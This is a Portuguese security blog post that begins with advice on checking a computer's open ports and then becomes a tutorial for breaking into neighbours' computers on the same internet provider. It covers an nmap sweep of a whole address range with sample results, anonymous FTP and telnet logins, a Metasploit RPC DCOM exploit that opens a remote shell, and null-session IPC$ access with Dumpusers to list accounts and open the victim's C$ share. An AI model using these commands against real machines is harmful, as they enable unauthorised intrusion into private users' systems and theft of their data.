INW-Segurança

É muito importante você monitorar as portas de conexões de seu computador para identificação de Spywares, Keyloggers, Backdoors, etc.
O computador possui 65.536 portas e várias precisam estar abertas para o funcionamento de programas que utilizam a internet como Navegadores, Messenger. Resumindo, para existir conexões TCP/UDP é necessário uma porta de conexão. Portanto não adianta você identificar apenas uma porta aberta pois na maioria das vezes a porta realmente precisa estar abertas e conectadas, e são muitas. O ideal para você procurar portas abertas por arquivos mal intencionados é você associar a porta ao processo.

Vamos utilizar o Insecuritynet 3.X para isto:

Entre em:
Inicio -> Gerenciamento Local -> Gerenciar Portas -> Visualizar portas abertas

Observe:

CODIGO DE CORES:

Leia Mais →

Qual a porta usada para HTTP? e LDAP? e POP3? e SMTP? TELNET? e FTP? DHCP e MSN…?
Depois de lerem o título alguns de vocês devem estar pensando “…lá vem mais do mesmo…”. Enfim, vamos em frente.

Invasão pelas portas:

21: FTP

23: TELNET

135: RPC

445: COMPARTILHAMENTO

Estes ataques precisam ter pessoas do mesmo provedor que você.

Vamos começar:

Pegue o seu ip externo(sugestão:www.meuip.com.br ).

Baixe o nmap e instale no seu pc.

Vamos supor que o seu ip seja: 201.33.22.18.

Entre no prompt comando do Windows e digite nmap. Aparecerá um montão de opções e ajudas para você aprende a utilizar.

Prosseguindo…

Iremos fazer scanner de portas nos computadores da sua redondeza que tem o mesmo provedor que você.

digite:

nmap -sV -T Insane -A -v 201.33.22.1-254 -p21,23,135,44

Pronto vai listar todas as portas abertas de todos os usuários da sua banda larga ou do seu bairro, estado etc depende da sua banda.

Código:

Discovered open port 21/tcp on 201.33.22.223
Discovered open port 23/tcp on 201.33.22.1
Discovered open port 23/tcp on 201.33.22.186
Discovered open port 445/tcp on 201.33.22.14
Discovered open port 445/tcp on 201.33.22.97
Discovered open port 445/tcp on 201.33.22.24
Discovered open port 445/tcp on 201.33.22.152
Discovered open port 445/tcp on 201.33.22.149
Discovered open port 445/tcp on 201.33.22.81
Discovered open port 445/tcp on 201.33.22.69
Discovered open port 445/tcp on 201.33.22.9
Discovered open port 445/tcp on 201.33.22.55
Discovered open port 445/tcp on 201.33.22.113
Discovered open port 445/tcp on 201.33.22.218
Discovered open port 445/tcp on 201.33.22.21
Discovered open port 445/tcp on 201.33.22.107
Discovered open port 445/tcp on 201.33.22.111
Discovered open port 445/tcp on 201.33.22.56
Discovered open port 445/tcp on 201.33.22.178
Discovered open port 445/tcp on 201.33.22.191
Discovered open port 445/tcp on 201.33.22.157
Discovered open port 445/tcp on 201.33.22.127
Discovered open port 445/tcp on 201.33.22.29
Discovered open port 445/tcp on 201.33.22.207
Discovered open port 135/tcp on 201.33.22.175
Discovered open port 135/tcp on 201.33.22.164

Invasao pela porta 21

vamos lá… ira aparecer um tanto de computadores que tem a porta 21 aberta. Todos aqueles que tiverem a mesma aberta. Voce pode tentar logar como anonymous, pois alguns administradores ou pessoas nao si preocupam em retirar o usuario anonymous do ftp.

Iniciar>Executar>cmd>ftp>open>201.33.22.223>anonym ous>a

Invasao pela porta 23

Iniciar>Executar>cmd>telnet>open>201.33.22 23

Invasao pela porta 135

CASO a porta 135 aberta, podemos usar o METASPLOIT

abra o metasploit na interface web. procure pelo exploit MICROSOFT RPC.

depois disso escolha o tipo de conexao como: GERENIC\SHELL_BLIND_TCP ou voce que sabe o tipo de conexao a ser usada.

depois disso matenha as informaçoes padroes do metasploit só inclua o ip da vitima, pois so o Windows dele nao for atualizado, ele ja vem como shell. Essa invasão rpc dcom já ficou obsoleta também.
Invasao pela porta 445

Esta porta é de compartilhamento.

Iniciar>Executar>cmd>net use \\201.45.241.175\ipc$ “” /u:””

Comando concluído com êxito.
baixa o Dumpusers

ponha ele no C:\
abra o cmd digite;

dumpusers -target 201.45.241.175 -type notdc -start 1 -stop 900 -mode verbose
depois você vai no:

iniciar>executar>\\201.45.241.175\c$

Fonte desconhecida.